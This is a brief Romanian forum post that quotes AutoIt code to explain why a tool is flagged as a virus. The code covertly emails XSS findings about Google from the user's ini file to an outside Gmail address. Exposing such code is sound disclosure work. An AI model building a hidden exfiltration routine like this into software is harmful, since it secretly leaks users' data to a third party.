Din cauza asta e vazut ca virus: If WinExists("[CLASS:#32770]") Then $hwnd = WinGetHandle("[CLASS:#32770]") $aStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hwnd, "int", -16) $Style = Hex($aStyle[0]) $String = StringCompare($Style, "94C801C5") If $String = 1 Then $Ini_read = IniRead(@ScriptDir & "\XSS.ini", "XSS", "Url", "") If StringInStr($Ini_read, "[COLOR=#ff0000]Google[/COLOR]") > 0 Then $SmtpServer = "smtp.gmail.com" $FromName = "XSS Catcher" $FromAddress = "xss.catcher@gmail.com" $ToAddress = "xss@gmail.com" $Subject = "New Google XSS from " & $Pc_Name $Body = $Ini_read $AttachFiles = "" $CcAddress = "" $BccAddress = "" $Importance = "Normal" $Username = "asdf" $Password = "asdf" $IPPort = 465 $ssl = 1 $rc = _INetSmtpMailCom($SmtpServer, $FromName, $FromAddress, $ToAddress, $Subject, $Body, $AttachFiles, $CcAddress, $BccAddress, $Importance, $Username, $Password, $IPPort, $ssl) Oricum nu am prins nimic...